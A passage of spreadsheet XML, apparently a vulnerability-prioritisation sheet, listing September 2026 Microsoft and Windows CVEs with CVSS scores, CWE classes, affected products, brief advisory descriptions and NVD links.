    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69649</t>
        </is>
      </c>
      <c r="C886" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D886" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E886" s="5" t="inlineStr"/>
      <c r="F886" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G886" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H886" s="5" t="inlineStr"/>
      <c r="I886" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J886" s="5" t="inlineStr"/>
      <c r="K886" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L886" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69669</t>
        </is>
      </c>
      <c r="C887" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D887" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E887" s="5" t="inlineStr"/>
      <c r="F887" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G887" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H887" s="5" t="inlineStr"/>
      <c r="I887" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J887" s="5" t="inlineStr"/>
      <c r="K887" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L887" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69671</t>
        </is>
      </c>
      <c r="C888" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D888" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E888" s="5" t="inlineStr"/>
      <c r="F888" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G888" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H888" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J888" s="5" t="inlineStr"/>
      <c r="K888" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L888" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69676</t>
        </is>
      </c>
      <c r="C889" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D889" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E889" s="5" t="inlineStr"/>
      <c r="F889" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G889" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H889" s="5" t="inlineStr"/>
      <c r="I889" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J889" s="5" t="inlineStr"/>
      <c r="K889" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L889" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69678</t>
        </is>
      </c>
      <c r="C890" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D890" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E890" s="5" t="inlineStr"/>
      <c r="F890" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G890" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H890" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L890" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69686</t>
        </is>
      </c>
      <c r="C891" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D891" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E891" s="5" t="inlineStr"/>
      <c r="F891" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G891" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H891" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I891" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J891" s="5" t="inlineStr"/>
      <c r="K891" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L891" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69712</t>
        </is>
      </c>
      <c r="C892" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D892" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E892" s="5" t="inlineStr"/>
      <c r="F892" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G892" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H892" s="5" t="inlineStr"/>
      <c r="I892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L892" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69716</t>
        </is>
      </c>
      <c r="C893" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D893" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E893" s="5" t="inlineStr"/>
      <c r="F893" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G893" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H893" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I893" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J893" s="5" t="inlineStr"/>
      <c r="K893" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L893" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69722</t>
        </is>
      </c>
      <c r="C894" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D894" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E894" s="5" t="inlineStr"/>
      <c r="F894" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G894" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H894" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I894" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J894" s="5" t="inlineStr"/>
      <c r="K894" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L894" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69724</t>
        </is>
      </c>
      <c r="C895" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D895" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E895" s="5" t="inlineStr"/>
      <c r="F895" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G895" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H895" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I895" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J895" s="5" t="inlineStr"/>
      <c r="K895" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L895" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69729</t>
        </is>
      </c>
      <c r="C896" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D896" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E896" s="5" t="inlineStr"/>
      <c r="F896" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G896" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H896" s="5" t="inlineStr"/>
      <c r="I896" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J896" s="5" t="inlineStr"/>
      <c r="K896" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L896" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69740</t>
        </is>
      </c>
      <c r="C897" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D897" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E897" s="5" t="inlineStr"/>
      <c r="F897" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G897" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H897" s="5" t="inlineStr"/>
      <c r="I897" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J897" s="5" t="inlineStr"/>
      <c r="K897" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L897" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69742</t>
        </is>
      </c>
      <c r="C898" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D898" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E898" s="5" t="inlineStr"/>
      <c r="F898" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G898" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H898" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="I898" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J898" s="5" t="inlineStr"/>
      <c r="K898" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L898" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69759</t>
        </is>
      </c>
      <c r="C899" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D899" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E899" s="5" t="inlineStr"/>
      <c r="F899" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G899" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H899" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I899" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J899" s="5" t="inlineStr"/>
      <c r="K899" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L899" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69764</t>
        </is>
      </c>
      <c r="C900" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D900" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E900" s="5" t="inlineStr"/>
      <c r="F900" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G900" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H900" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I900" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J900" s="5" t="inlineStr"/>
      <c r="K900" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L900" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69767</t>
        </is>
      </c>
      <c r="C901" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D901" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E901" s="5" t="inlineStr"/>
      <c r="F901" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G901" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H901" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I901" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J901" s="5" t="inlineStr"/>
      <c r="K901" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L901" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69772</t>
        </is>
      </c>
      <c r="C902" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D902" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E902" s="5" t="inlineStr"/>
      <c r="F902" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G902" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H902" s="5" t="inlineStr"/>
      <c r="I902" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J902" s="5" t="inlineStr"/>
      <c r="K902" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L902" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69778</t>
        </is>
      </c>
      <c r="C903" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D903" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E903" s="5" t="inlineStr"/>
      <c r="F903" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G903" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H903" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I903" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J903" s="5" t="inlineStr"/>
      <c r="K903" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L903" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69784</t>
        </is>
      </c>
      <c r="C904" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D904" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E904" s="5" t="inlineStr"/>
      <c r="F904" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G904" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H904" s="5" t="inlineStr"/>
      <c r="I904" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J904" s="5" t="inlineStr"/>
      <c r="K904" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L904" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69797</t>
        </is>
      </c>
      <c r="C905" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D905" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E905" s="5" t="inlineStr"/>
      <c r="F905" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G905" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H905" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I905" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J905" s="5" t="inlineStr"/>
      <c r="K905" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L905" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69857</t>
        </is>
      </c>
      <c r="C906" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D906" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E906" s="5" t="inlineStr"/>
      <c r="F906" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G906" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure</t>
        </is>
      </c>
      <c r="H906" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure_cosmos_db</t>
        </is>
      </c>
      <c r="I906" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J906" s="5" t="inlineStr"/>
      <c r="K906" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L906" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Azure Cosmos DB allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69857</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="C907" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D907" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E907" s="5" t="inlineStr"/>
      <c r="F907" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G907" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H907" s="5" t="inlineStr"/>
      <c r="I907" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J907" s="5" t="inlineStr"/>
      <c r="K907" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L907" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70178</t>
        </is>
      </c>
      <c r="C908" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D908" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E908" s="5" t="inlineStr"/>
      <c r="F908" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G908" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H908" s="5" t="inlineStr">
        <is>
          <t>microsoft:fabric</t>
        </is>
      </c>
      <c r="I908" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L908" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Fabric allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70178</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="C909" s="5" t="n">
        <v>8.800000000000001</v>
